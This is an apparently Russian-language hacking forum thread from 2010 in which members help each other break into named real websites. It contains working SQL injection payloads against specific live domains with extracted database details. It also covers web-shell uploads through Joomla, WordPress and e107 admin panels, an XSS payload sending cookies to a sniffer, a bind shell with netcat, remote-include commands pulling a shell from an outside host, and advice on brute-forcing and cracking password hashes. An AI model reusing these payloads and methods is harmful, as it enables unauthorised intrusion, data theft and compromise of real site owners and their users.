You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''36''' at line 1
http://www.aquaticplantcentral.com/forumapc/plantfinder/details.php?id=36%20order%20by%201000-- <-true
:confused:
_http://www.aquaticplantcentral.com/forumapc/plantfinder/details.php?id=-36'+union+select+1,version(),3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22--+
Здесь есть SQL-inj?
http://www.bigr.nl/website/structure/main.php?page=people&subpage=person&id=51'+order+by+1000+--+
_http://www.bigr.nl/website/index.php?page=people&subpage=person&id=JifkeVeenland')+and+substring(version(),1,1)=5+ and+('1'='1
или через ошибку
_http://www.bigr.nl/website/index.php?page=people&subpage=person&id=JifkeVeenland')+and+(SELECT+COUNT(*)+FROM+(SELE CT+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONC AT(MID(VERSION(),1,63),+FLOOR(RAND(0)*2)))+and+('1 '='1
не смог больше ничего придумать..
http://www.bigr.nl/website/index.php?page=people&subpage=person&id=JifkeVeenland')+and+substring(version(),1,1)=5+ and+('1'='1
или через ошибку
_http://www.bigr.nl/website/index.php?page=people&subpage=person&id=JifkeVeenland')+and+(SELECT+COUNT(*)+FROM+(SELE CT+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONC AT(MID(VERSION(),1,63),+FLOOR(RAND(0)*2)))+and+('1 '='1
не смог больше ничего придумать..
Класс!
привет команде;
http://www.msufoundation.com/impact/stories/details.php?id=-36 union all select 1,concat_ws(0x3a,unhex(hex(version())),unhex(hex(d atabase()))),3,2,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28--
мы получили->4.1.14:extaffairs
http://www.msufoundation.com/impact/stories/details.php?id=36 and substring(version(),1,1)=4 -> true
Я не знаю, почему он тут ошибки, это должно быть правдой
http://www.msufoundation.com/impact/stories/details.php?id=36 and substring(database(),1,1)="e" <-error
:confused:
привет команде;
http://www.msufoundation.com/impact/stories/details.php?id=-36 union all select 1,concat_ws(0x3a,unhex(hex(version())),unhex(hex(d atabase()))),3,2,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28--
мы получили->4.1.14:extaffairs
http://www.msufoundation.com/impact/stories/details.php?id=36 and substring(version(),1,1)=4 -> true
Я не знаю, почему он тут ошибки, это должно быть правдой
http://www.msufoundation.com/impact/stories/details.php?id=36 and substring(database(),1,1)="e" <-error
:confused:
MagicQuotes on
привет команде;
http://www.msufoundation.com/impact/stories/details.php?id=-36 union all select 1,concat_ws(0x3a,unhex(hex(version())),unhex(hex(d atabase()))),3,2,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28--
мы получили->4.1.14:extaffairs
http://www.msufoundation.com/impact/stories/details.php?id=36 and substring(version(),1,1)=4 -> true
Я не знаю, почему он тут ошибки, это должно быть правдой
http://www.msufoundation.com/impact/stories/details.php?id=36 and substring(database(),1,1)="e" <-error
:confused:
http://www.msufoundation.com/impact/stories/details.php?id=36+and+lower (http://www.mysql.ru/docs/maryan/#lower)(ascii (http://uk.wikipedia.org/wiki/ASCII)(substring(database(),1,1)))=101 (http://www.industrialnets.ru/files/misc/ascii.pdf)
http://www.msufoundation.com/impact/stories/details.php?id=36+and+lower (http://www.mysql.ru/docs/maryan/#lower)(ascii (http://uk.wikipedia.org/wiki/ASCII)(substring(database(),1,1)))=101 (http://www.industrialnets.ru/files/misc/ascii.pdf)
Или же
http://www.msufoundation.com/impact/stories/details.php?id=36+and+substring(database(),1,1)=0x 65
DrakonSerg
03.06.2010, 15:21
что можно вытащить полезного (к чему докопаться) если просматриваются папки
/backup/
/includes/
/js/
/scripts/
/temp/
/email/
очень много таких сайтов насобиралось, в основном онлайн шопы.
И еще одно, есть ли возможность взлома либо брута cPanel 11?
Привет группы;
Можно ли придать этим сайтом?, потому что у нас нет какой-либо аргумент URL
http://www.kitterytradingpost.com/product.php
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 :confused:
[Feldmarschall]
03.06.2010, 17:07
Привет группы;
Можно ли придать этим сайтом?, потому что у нас нет какой-либо аргумент URL
http://www.kitterytradingpost.com/product.php
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 :confused:
http://www.kitterytradingpost.com/product.php/prodid/3647
делаешь так
http://www.kitterytradingpost.com/product.php?prodid=-3647 и вот тут дальше копай
ребят есть способ заливки шелла через Openads (phpAdsNew) ? :)
Iceangel_
03.06.2010, 17:46
ребят есть способ заливки шелла через Openads (phpAdsNew) ? :)
тынц (https://forum.antichat.ru/thread150144.html)
для кого тему прикрепляли? в след раз будет минус.
тынц (https://forum.antichat.ru/thread150144.html)
для кого тему прикрепляли? в след раз будет минус.
OK , спасибо ))
']http://www.kitterytradingpost.com/product.php/prodid/3647
делаешь так
http://www.kitterytradingpost.com/product.php?prodid=-3647 и вот тут дальше копай
http://www.kitterytradingpost.com/product.php?prodid=3647 order by 29 <-error
Итак, мы имеем 28
http://www.kitterytradingpost.com/product.php?prodid=3647 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28-- <- The used SELECT statements have a different number of columns
что случилось? :confused:
The used SELECT statements have a different number of columns (http://translate.google.com) , переменная используется в >1 запросе.
у нас есть какое-либо решение атаковать этот сайт?
CyberHunter
03.06.2010, 19:07
у нас есть какое-либо решение атаковать этот сайт?
Вопрос №5 Подбираю столбцы ордером пишет(допустим) 2, делаю запрос union+select+1,2 ничего не выводит (выводит ошибку)
Первое что нужно сделать в этом случае. проверить версию базы, например так:
site.com/index.php?id=1+and+substring(version(),1,1)=3
site.com/index.php?id=1+and+substring(version(),1,1)=4
site.com/index.php?id=1+and+substring(version(),1,1)=5
Если оказалось, что версия третья, то неудивительно. что вывода нет, оператор union введён с четвётой версии mysql. B этом случае читаем статьи по проведению инъекций в 3 ветке
Если версия >=4 . или мы видим ошибку different number of columns (https://forum.antichat.ru/threadnav43966-8-10.html) это вовсе не означает, что вывода не будет.
Вероятность найти вывод всё равно остаётся. По этой теме идём читать сюда:
different number of columns
с поста 79 и вниз со всеми комментариями
Читай.
Там еще вырезаются ( ) так что некоторые методы вывода сразу лесом =(
Jokester
03.06.2010, 21:16
там вырезаются запятые, проблема именно в этом
http://www.kitterytradingpost.com/product.php?prodid=36,,,,47
Подскажите команды для работы с sql-inj - mysql 4 ветки.
Команды просмотра таблиц базы данных ну и собсвенно самих таблиц.
А пока вы тут мне подсказываете я на другие форумы полез
P.S с 5 веткой проще работать
Подскажите команды для работы с sql-inj - mysql 4 ветки.
Команды просмотра таблиц базы данных ну и собсвенно самих таблиц.
А пока вы тут мне подсказываете я на другие форумы полез
P.S с 5 веткой проще работать
Я ненавижу лето из-за таких вопросов.
1. SQL-инъекции и PROCEDURE ANALYSE() (http://raz0r.name/obzory/sql-inekcii-i-procedure-analyse/) (c) Raz0r.
Но работает реально редко.
2. Бруть.
3. Только в 5 и выше версии mysql, есть information_schema.
4. Удали свой аккаунт с античата.
DrakonSerg
04.06.2010, 07:19
Блин, мне уже до неприличия надоело задавать нубские вопросы. Сам не догоняю ((
На запрос:
/index.php?axn=1'
вылазит
INSERT INTO referer VALUES(Null,'мой IP','','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)','1275620851','1'')Ungültige Abfrage: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'')' at line 1
на запрос:
/index.php?do=%22%3E%3Cscript%3Ealert%28%27PTsecuri ty+Scanner+Test%27%29%3C%2Fscript%3E%3C%22&name=1&email=scanner@ptsecurity.com&p=1&axn=1&query=1
(это уже из сканера)
выдает
Warning: include(includes/1.inc.php) [function.include]: failed to open stream: No such file or directory in /www/htdocs/w00645df/shop/includes/template.inc.php on line 217
Warning: include(includes/1.inc.php) [function.include]: failed to open stream: No such file or directory in /www/htdocs/w00645df/shop/includes/template.inc.php on line 217
Warning: include() [function.include]: Failed opening 'includes/1.inc.php' for inclusion (include_path='.:/usr/share/php:..') in /www/htdocs/w00645df/shop/includes/template.inc.php on line 217
Внимание, вопрос)) Уязвим?
И еще.
На запрос www.site.com/admin/ вылазит не админка, а какой то код на всю страницу (100500 скролов)
Вот кусочек:
q=tsop6238
q=Atmel+AVR+ISP+mkII
q=Atmel+AVR+ISP+mkII+shop
q=samsung+tantal q=f q=
q=xmega+eur
q=xplain+eur+atmel
q=http://site.com/browse_002002_18__.php q=t
q=DM9161AEP+cost q=f q=
q=ATNGW100
q=attiny25+eur q=f q=
q=gp2y0a21yk+shop q=f q=
q=DM9161AEP
q=eZ430-Chronos-868 q=t
/index.php?name=../index.php&p=../index.php&axn=1&query=../index.php
А вообще есть способ ещё один, по кол-ву вопросов в этой теме, который некто незнает.
Наз-ся вывод через ошибку ****...
/index.php?axn=1')or(1,1)=(select+count(0),concat(( select+database()+from+information_schema.tables+l imit+0,1),floor(rand(0)*2))from(information_schema .tables)group+by+2)--+
EoGeneo,DrakonSerg....
"Господа, задающие вопросы:
хватит ПИСАТЬ, попробуйте сначала хоть что-то ЧИТАТЬ !!!" (с) Jokester
DrakonSerg
04.06.2010, 08:08
EoGeneo,DrakonSerg....
"Господа, задающие вопросы:
хватит ПИСАТЬ, попробуйте сначала хоть что-то ЧИТАТЬ !!!" (с) Jokester
где почитать, уважаемый? Я кроме инфы, что нужно выводить через юнион селект или ордер би инфы не нашел.
Я бы с удовольствием сам бы поучился, но хз где учиться
где почитать, уважаемый? Я кроме инфы, что нужно выводить через юнион селект или ордер би инфы не нашел.
Я бы с удовольствием сам бы поучился, но хз где учиться
https://forum.antichat.ru/showpost.php?p=407227&postcount=3
Топик с маном по скулям.
Ладно вопрос по другому поствлю.
GROUP_CONCAT() - С помошью этого запроса в 5 ветке мускула можно получить список таблиц бд.
Какой запрос используется для получения списка в 4 ветке мускула.
Ладно вопрос по другому поствлю.
GROUP_CONCAT() - С помошью этого запроса в 5 ветке мускула можно получить список таблиц бд.
Какой запрос используется для получения списка в 4 ветке мускула.
О МАЙ ГАД Ты непобедим!
Кури маны, чо такое group_concat().
Если следовать твоей логике, то concat_ws специально mysql разработчики сделали для хакеров, ну мол там user(),database(),version() выводить одним запросом, а так же юзеров, пассы и т.п.
Извеняюсь забыл ещё.
http://s11.radikal.ru/i184/0912/4a/89d235784404.jpg
Ладно вопрос по другому поствлю.
GROUP_CONCAT() - С помошью этого запроса в 5 ветке мускула можно получить список таблиц бд.
Какой запрос используется для получения списка в 4 ветке мускула.
спусти тормозную жидкость...почитай ман по скулям... не раз уже тыкали носом в ман, неужели не хватает смелости все таки почитать что нибудь оттуда? тебе же сказали что информационная схема есть только в 5 версии мускула, а в 4 надо подбирать брутом..для этого есть куча утилит.. гугл тебе в помощь
спусти тормозную жидкость...почитай ман по скулям... не раз уже тыкали носом в ман, неужели не хватает смелости все таки почитать что нибудь оттуда? тебе же сказали что информационная схема есть только в 5 версии мускула, а в 4 надо подбирать брутом..для этого есть куча утилит.. гугл тебе в помощь
Спасибо, разобрался.
+
привет команде;
http://beinoma.com/details.php?prodid=974%27 <-не показывать изображения
я пробовал много методов, но никакого результата
Как можно "inject" этот сайт :confused:
c чего вы взяли что там inject...
c чего вы взяли что там inject...
Я думаю, что что-то не по запросу, которые делают изображение не показали
Верно ли это?
привет команде;
http://beinoma.com/details.php?prodid=974%27 <-не показывать изображения
я пробовал много методов, но никакого результата
Как можно "inject" этот сайт :confused:
То что там инекция этот вопрос под самнением.
А второе, там еще и ошибки отключены.
привет команде;
http://beinoma.com/details.php?prodid=974%27 <-не показывать изображения
я пробовал много методов, но никакого результата
Как можно "inject" этот сайт :confused:
Дак попробуй написать
http://beinoma.com/details.php?prodid=974+and+1=1-- если отобразит
http://beinoma.com/details.php?prodid=974+and+1=2--
не отобразит, то крути как слепую.
То что там инекция этот вопрос под сOмнением.
А второе, там еще и ошибки отключены.
молчал бы горе хакер...я утром тебе рекомендовал читать маны..так вот читай и не пости глупости, если ошибки нет это еще не значит что иньекции нет..
http://beinoma.com/details.php?prodid=547&cid=1'
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/p14tnu81/public_html/details.php on line 57
http://beinoma.com/details.php?prodid=547&cid=1+union+select+1,2,3,4,5--
Pashkela
04.06.2010, 15:15
http://beinoma.com/details.php?prodid=547&cid=if((select+substring(version(),1,1)=5),1,(sele ct+1+union+select+2))
POST=y
@@basedir: /
@@tmpdir: /tmp/
database(): p14tnu81_beipoa
@@datadir: /var/lib/mysql/
version(): 5.0.67-community
@@version_compile_os: redhat-linux-gnu
user(): p14tnu81@localhost
молчал бы горе хакер...я утром тебе рекомендовал читать маны..так вот читай и не пости глупости, если ошибки нет это еще не значит что иньекции нет.. http://beinoma.com/details.php?prodid=547&cid=1' Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/p14tnu81/public_html/details.php on line 57 http://beinoma.com/details.php?prodid=547&cid=1+union+select+1,2,3,4,5--
вы дяденька зря сердитесь на человека.... и вообще вы можете отличать параметр prodid от параметра сid? автор указал именно параметр prodid
вы дяденька зря сердитесь на человека.... и вообще вы можете отличать параметр prodid от параметра сid? автор указал именно параметр prodid
никто ни на кого не сердится...солдат ребенка не обидит как говорится.. и причем здесь параметр пропид или сид? разговор шел о скуле..нате вам скулю...а пашкела вам на блюдечке предоставил...
P.S. с отличалкой у меня пока все нормально...
P.S.2 и к чему ваш пост написан совсем непонятно...
Кстати да. задачи найти скулю на сайте небыло.
Был указан определенный параметр - собственно в нем и искали.
CyberHunter
04.06.2010, 17:06
Подскажите или подкиньте ссылку на мануал о том, как залить шелл в joomla! 1.5 имея доступ в админку.
Подскажите или подкиньте ссылку на мануал о том, как залить шелл в joomla! 1.5 имея доступ в админку.
Ищешь настройки,дописываешь php в разрешенный формат.Идешь в медиа-менеджер и льешь шелл в нужную тебе папку,насколько я понмню (лил давно как раз в 1.5) шелл будет в папке /images .
Привет! Попался мне тут портальчик на португальском языке и есть табличка с полями*значениями
usr_frase*usr_senha:
606715696665bada*3f886c5806f6861b
606715696665bada*672e2ebf3645a3bc
606715696665bada*3f886c5806f6861b
606717496665bcba*2d793cff37fd171b
Это, как я понял пары логин*пароль. Причём первая часть неизменна у разных пользователей (за редким исключением), а вторая меняется.
Есть у кого мысли как расшифровать?
UPD. Гугл сказал, что первая часть попадается тут: http://emsmat.sev.gob.mx/claves.php
qq6ka
это хеши mysql
click (https://forum.antichat.ru/thread136458.html)
А я дебил. Усложняю себе жизнь. Спасибо.
Подскажите или подкиньте ссылку на мануал о том, как залить шелл в joomla! 1.5 имея доступ в админку.
установить модуль и тупо льешь туда шелл...
либо извращаешся и устанавливаешь джумла ксплорер..а через него уже и шелла не надо..
Не могу вывести database(), кто может объяснить в чем дело?
http://www.musicandmeaning.net/issues/showArticle.php?artID=-5.7+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19+--+
Pashkela
04.06.2010, 19:54
http://www.musicandmeaning.net/fora/view_post.php?postid=2+union+select+1,2,concat_ws( 0x3a,version(),database(),user()),4,5,6,7+limit+1, 1--+
есть шелл на системе freebsd 7.2, нужен бекконект
дальше /usr/local/www не пускает -"Can't open this folder!"
Помогите пожалуйста
есть шелл на системе freebsd 7.2, нужен бекконект
дальше /usr/local/www не пускает -"Can't open this folder!"
Помогите пожалуйста
пробовал сразу в папку /tmp/ прыгнуть?
пробовал сразу в папку /tmp/ прыгнуть?
да, cd /tmp/ не пашет..
Pashkela
04.06.2010, 20:30
есть шелл на системе freebsd 7.2, нужен бекконект
дальше /usr/local/www не пускает -"Can't open this folder!"
Помогите пожалуйста
какая связь между тем куда пускает/не пускает и бекконектом? Шелл лежит же в папке, доступной на запись? В пределах /usr/local/www есть хоть одна папка, доступная на запись? Ну и залей туда скрипт бекконекта и запусти.
Или просто netcat-ом, если доступен в консоли
https://forum.antichat.net/thread200753.html
И сам сплойт необязательно запускать из /tmp
и вообще поюзай поиск по сайту, всё тут есть
какая связь между тем куда пускает/не пускает и бекконектом? Шелл лежит же в папке, доступной на запись? В пределах /usr/local/www есть хоть одна папка, доступная на запись? Ну и залей туда скрипт бекконекта и запусти.
Или просто netcat-ом, если доступен в консоли
https://forum.antichat.net/thread200753.html
И сам сплойт необязательно запускать из /tmp
и вообще поюзай поиск по сайту, всё тут есть
права на папку с которой запускаю бк drwxrwxrwx
бк юзал шелла ВСО и этот http://fsb-my.name/c/apache-handler - 0 реакции
Или просто netcat-ом
Скажи как, а то я почти не знаю неткат-а
ПС
Когда-то уже делал бк из под темп, но после того как админ подшаманил нет доступа к /
ППС
мб фаервол мешает?
права на папку с которой запускаю бк drwxrwxrwx
бк юзал шелла ВСО и этот http://fsb-my.name/c/apache-handler - 0 реакции
Скажи как, а то я почти не знаю неткат-а
ПС
Когда-то уже делал бк из под темп, но после того как админ подшаманил нет доступа к /
ППС
мб фаервол мешает?
а как ты делаешь бекконнект? без нетката то? какой утилитой пользуешся?
http://uasc.org.ua/files/backdoor.pl.txt
вот тебе перловый биндшелл..меня много раз спасал когда всо не срабатывал, на серванте в шелле пишешь
perl bind.pl
у себя запускаешь неткат и пишешЬ nc 127.0.0.1 31337
вместо локалхоста пишешь айпишник серванта...
у себя то я знаю как использовать неткат, но как неткат-ом с одного серва коннектится к другому - не знаю..
спс за бинд, но perl bind.pl ничего не происходит, как юзать perl bind.pl ip port? ili perl bind.pl ip ?
а сейф мод? a может стоит ограничение на исполнение? а перл есть на серванте?
Safe mode: OFF
перл есть..
Есть pass админа, но админку не могу найти.Сайта про Майкла Джексона.
» http://www.jacksonaction.com/images/ HTTP 403 Forbidden
» http://www.jacksonaction.com/temp/ HTTP 403 Forbidden
» http://www.jacksonaction.com/_private/ HTTP 403 Forbidden
» http://www.jacksonaction.com/~root HTTP 403 Forbidden
» http://www.jacksonaction.com/~nobody HTTP 403 Forbidden
» http://www.jacksonaction.com/2009/ HTTP 200 OK
» http://www.jacksonaction.com/bad/ HTTP 200 OK
» http://www.jacksonaction.com/history/ HTTP 200 OK
» http://www.jacksonaction.com/icons/ HTTP 200 OK
» http://www.jacksonaction.com/index.php HTTP 200 OK
» http://www.jacksonaction.com/search.php HTTP 200 OK
» http://www.jacksonaction.com/temp/ HTTP 403 Forbidden
» http://www.jacksonaction.com/text/ HTTP 403 Forbidden
• Possible engine => FrontPage:
» http://www.jacksonaction.com/_vti_bin/ HTTP 403 Forbidden
» http://www.jacksonaction.com/_vti_bin/_vti_aut/ HTTP 401 Authorization Required
» http://www.jacksonaction.com/_vti_cnf/ HTTP 403 Forbidden
» http://www.jacksonaction.com/_vti_log/ HTTP 403 Forbidden
» http://www.jacksonaction.com/_vti_pvt/ HTTP 403 Forbidden
» http://www.jacksonaction.com/_vti_txt/ HTTP 403 Forbidden
Есть pass админа, но админку не могу найти.Сайта про Майкла Джексона.
» http://www.jacksonaction.com/images/ HTTP 403 Forbidden
» http://www.jacksonaction.com/temp/ HTTP 403 Forbidden
» http://www.jacksonaction.com/_private/ HTTP 403 Forbidden
» http://www.jacksonaction.com/~root HTTP 403 Forbidden
» http://www.jacksonaction.com/~nobody HTTP 403 Forbidden
» http://www.jacksonaction.com/2009/ HTTP 200 OK
» http://www.jacksonaction.com/bad/ HTTP 200 OK
» http://www.jacksonaction.com/history/ HTTP 200 OK
» http://www.jacksonaction.com/icons/ HTTP 200 OK
» http://www.jacksonaction.com/index.php HTTP 200 OK
» http://www.jacksonaction.com/search.php HTTP 200 OK
» http://www.jacksonaction.com/temp/ HTTP 403 Forbidden
» http://www.jacksonaction.com/text/ HTTP 403 Forbidden
• Possible engine => FrontPage:
» http://www.jacksonaction.com/_vti_bin/ HTTP 403 Forbidden
» http://www.jacksonaction.com/_vti_bin/_vti_aut/ HTTP 401 Authorization Required
» http://www.jacksonaction.com/_vti_cnf/ HTTP 403 Forbidden
» http://www.jacksonaction.com/_vti_log/ HTTP 403 Forbidden
» http://www.jacksonaction.com/_vti_pvt/ HTTP 403 Forbidden
» http://www.jacksonaction.com/_vti_txt/ HTTP 403 Forbidden
admin page finder:
http://th3-0utl4ws.com/tools/admin-finder/
как можно обойти пароль на папку?
как можно обойти пароль на папку?
только это нарыл..http://www.securitylab.ru/vulnerability/199904.php
а так заливай шелл и три хтацес..
нет не какого доступа на сервер :(
админка так защищена.
я еще не слышал об обходе такого
ПС
БрутЬ, брутЬ и еще раз ЬрутЪ
Подскажите пожалуйста.
На сайте при вводе вместо логина <script>alert()</script> выскакивает табличка. я так понял это xss. Покурили маны малеха ну так и не допёр. модифицирую запрос до
<sсriрt>img = new Image(); img.src = "путь до снифа?"+document.cookie;</sсriрt>
вставляю в то же поля и ничего не выскакивает. в чем прикол?
wildshaman
05.06.2010, 12:24
Прикол в том, что ничего и не выскочит, но куки отправятся на сниффер.
Спасибо. буду разбираться. у меня сниф делюкс и мильти каника, что то не ловит куки.
Что может мешать сделать бекконект ?Система freebsd 7.2.
Спасибо
Может быть тот порт занят через который ты бэкконнект делаешь.
сорь, я неправильно поставил вопрос.
Что мешает забиндить порт?
Подскажите, как правильно составить запрос?
form.php?pageid=93'+and+(select*from(select+count( *)from(select+1+union+select+2+union+select+3)x+gr oup+by+concat(mid((select+TABLE_NAME+from+INFORMAT ION_SCHEMA.COLUMNS+where+column_name+like+0x257025 ),1,64),floor(rand(0)*2)))z)+--+
Hi Team;
http://www.ibuycc.com.cn/product.php?id=77'
этого сайта SQL ошибка. Я пытался использовать "union select" до 50, но не результатом
Можем ли мы "inject" этот сайт? :confused:
я еще не слышал об обходе такого
ПС
БрутЬ, брутЬ и еще раз ЬрутЪ
есть готовый брут под этот случай?
.:[melkiy]:.
05.06.2010, 15:28
Hi Team;
http://www.ibuycc.com.cn/product.php?id=77'
этого сайта SQL ошибка. Я пытался использовать "union select" до 50, но не результатом
Можем ли мы "inject" этот сайт? :confused:
http://www.ibuycc.com.cn/product.php?id=-77+union+select+1,2,3,4,version(),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30
хватит спрашивать одно и тоже. читай статьи и всё будет ясно
К сожалению, не видел, любое проявление версия
Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /home/ibuyccco/public_html/product.php on line 295
Warning: Cannot modify header information - headers already sent by (output started at /home/ibuyccco/public_html/product.php:27) in /home/ibuyccco/public_html/includes/lib.function.php on line 182
Warning: Cannot modify header information - headers already sent by (output started at /home/ibuyccco/public_html/product.php:27) in /home/ibuyccco/public_html/includes/lib.function.php on line 192
‹�����xÚí}ëwG¶ïçËZùú(k]
так видно? О_о
http://www.ibuycc.com.cn/product.php?id=-77+union+select+1,2,3,4,version(),version(),7,vers ion(),9,10,version(),12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30
:.']http://www.ibuycc.com.cn/product.php?id=-77+union+select+1,2,3,4,version(),6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30
Благодарю за ответ, но не отображать версии
Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /home/ibuyccco/public_html/product.php on line 295
Warning: Cannot modify header information - headers already sent by (output started at /home/ibuyccco/public_html/product.php:27) in /home/ibuyccco/public_html/includes/lib.function.php on line 182
Warning: Cannot modify header information - headers already sent by (output started at /home/ibuyccco/public_html/product.php:27) in /home/ibuyccco/public_html/includes/lib.function.php on line 192
‹�����xÚí}ëwG¶ïçËZùú(k]
Благодарю за ответ, но не отображать версии
Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /home/ibuyccco/public_html/product.php on line 295
Warning: Cannot modify header information - headers already sent by (output started at /home/ibuyccco/public_html/product.php:27) in /home/ibuyccco/public_html/includes/lib.function.php on line 182
Warning: Cannot modify header information - headers already sent by (output started at /home/ibuyccco/public_html/product.php:27) in /home/ibuyccco/public_html/includes/lib.function.php on line 192
‹�����xÚí}ëwG¶ïçËZùú(k]
Убери пробелы...
есть готовый брут под этот случай?
Попробуй этот: https://forum.antichat.ru/thread109600.html
Anarh1st
05.06.2010, 23:33
Как залить шелл имея доступ к админке wp?
Anarh1st
неужели так трудно набрать в поиске нужные слова?
https://forum.antichat.ru/showpost.php?p=770176&postcount=3
Anarh1st
06.06.2010, 00:00
Извиняюсь =[
Cпасибо
CyberHunter
06.06.2010, 13:55
Подскажите, как залить шелл имея доступ к админке на joomla?
В Global Configuration разрешаю загрузку php, но когда захожу в Media Manager , то при загрузке шелла (в *.php) пишет: "Not a valid image." Как решить проблему? И как залить шелл другим способом?
Подскажите, как залить шелл имея доступ к админке на joomla?
В Global Configuration разрешаю загрузку php, но когда захожу в Media Manager , то при загрузке шелла (в *.php) пишет: "Not a valid image." Как решить проблему? И как залить шелл другим способом?
Templates, плагины.
// Или найти на ачате уже слабо?
Здесь есть SQL-inj?
http://www.bettingexpert.com/tip.php?id=49630'+order+by+1+--+
DrakonHaSh
06.06.2010, 14:40
да
http://www.bettingexpert.com/tip.php?id=49632 and 1=1
http://www.bettingexpert.com/tip.php?id=49632 and 1=2
http://www.bettingexpert.com/tip.php?id=49632 and left(version(),1)=5
http://www.bettingexpert.com/tip.php?id=49632 and left(version(),1)=4
CyberHunter
06.06.2010, 16:52
Templates, плагины.
Захожу в Extension Manager, выбираю Upload Package File, выбираю файл шелла начинаю заливать, но появляется: "JFolder::create: Could not create director Warning! Failed to move file.Unknown Archive Type"
Что не так?
в настройках медиа менеджера разреши загрузку пхп файлов... и даже если ругнулся , все равно проверь ..не залился ли твой шелл в папку в которую заливал
Интересует сайт: http://www.samfundet.dk
Помогите определить движок и версию, или найти SQL-inj.
http://www.samfundet.dk/artikel_text.php?art_id=-462'&op=sectioninfo&art_sid=17#en
http://www.samfundet.dk/artikel_text.php?art_id=-462'&op=sectioninfo&art_sid=17#en
Эх вы...
http://www.samfundet.dk/artikel_text.php?art_id=462&op=sectioninfo&art_sid=17#en
Текст есть? Есть.
http://www.samfundet.dk/artikel_text.php?art_id=462abcd&op=sectioninfo&art_sid=17#en
Текст есть? Есть.
Вывод: Нету там скули.
// http://www.samfundet.dk/artikel_text.php?art_id=462'&op=sectioninfo&art_sid=17#en
У тебя там ошибка из-за -
И да, напишите на лбу пожалуйста, ОШИБКА НЕ СКУЛЯ!
вот вам эффективное определение инъекта:
1) http://www.samfundet.dk/artikel_text.php?art_id=462&op=sectioninfo&art_sid=17#en
выводится страница
2)http://www.samfundet.dk/artikel_text.php?art_id=463-1&op=sectioninfo&art_sid=17#en
контент страницы изменился значит инъекции нет
Здесь можно вывести через rand()?
http://www.bettingexpert.com/tip.php?id=49632'+and+(select+1+from+(select+count (0),concat((select+version()),floor(rand(0)*2))+fr om+(select+1+union+select+2+union+select+3)x+group +by+2+limit+1)a)+--+
Заливаю shell.php, создает shell_php.html
Как html обрезать?
Заливаю shell.php, создает shell_php.html
Как html обрезать?
нульбайтом, например
CyberHunter
07.06.2010, 16:20
Скажите в чем проблема, когда заливаю шелл через админку в е107 CMS (делаю все как тут (https://forum.antichat.ru/showpost.php?p=2119209&postcount=64), первым и вторым способами), появляется ошибка: That file does not appear to be a valid .zip or .tar archive. Что не так делаю? Плагин заливаю 100% в формате .zip. Такое на всех сайтах, на которых доставал админку, происходит.
Что не так? И как залить шелл?
Как залить шелл в gallery2 имея доступ к админке?
Так же как и залить шелл на фтп, имея доступ к фтп.
Не получается. Лью shell.phtml, выводит shell_phtml.html
лей сначала форму для загрузки.
Потом через эту форму заливай шелл
Заливаю shell_phtml.html, выводит shell_phtml_html.html
Пробовал редактировать файл shell_phtml в админке.
Пишет:
Введеное Вами Название содержит недопустимые символы. Пожалуйста, выберете другое
Заливаю shell_phtml.html, выводит shell_phtml_html.html
Пробовал редактировать файл shell_phtml в админке.
Пишет:
Введеное Вами Название содержит недопустимые символы. Пожалуйста, выберете другое
ты не понял что над тобой постебались, фильтр стоит на раширение..
лей сначала форму для загрузки.
Потом через эту форму заливай шелл
А зачем лить форму, когда можно сразу шелл залить?
Здравствуйте! Я тут новичок и хотел бы спросить. Есть же хостинги, и у них хостятся сайты. Почему при взломе одного из этих сайтов (wso шелл) я могу видеть другие сайты и изменять их файлы, и всегда ли это????
А зачем лить форму, когда можно сразу шелл залить?
попугай попробуй ты, сейчас линк в ПМ скину.
Здравствуйте! Я тут новичок и хотел бы спросить. Есть же хостинги, и у них хостятся сайты. Почему при взломе одного из этих сайтов (wso шелл) я могу видеть другие сайты и изменять их файлы, и всегда ли это????
ответьте пожалуйста прошу
jecka3000
07.06.2010, 20:32
radikal, не всегда. Если хостер лол и нет защиты со смежными сайтами, то получив доступ к одному сайту, автоматически получаешь ко всем остальным
CyberHunter
07.06.2010, 21:30
Скажите в чем проблема, когда заливаю шелл через админку в е107 CMS (делаю все как тут, первым и вторым способами), появляется ошибка: That file does not appear to be a valid .zip or .tar archive. Что не так делаю? Плагин заливаю 100% в формате .zip. Такое на всех сайтах, на которых доставал админку, происходит.
Что не так? И как залить шелл?
Ответьте плз.
При выполнении запроса типа: site.ru/index.php?id=phpinfo(); Могу просмотреть пхпинфо. А как залить файл?
При выполнении запроса типа: site.ru/index.php?id=phpinfo(); Могу просмотреть пхпинфо. А как залить файл?
id=include("http://yoursite.com/yourfile");
id=copy($_GET[file1],$_GET[file2]);&file1=http://yoursite.com/yourfile.txt&file2=/yourpath/to/webfolder/
например
file1=http://microsoft.com/shell.txt&file2=/var/www/html/shell.php
если не знаешь полный путь к сайту to копируй шелл в папку /tmp
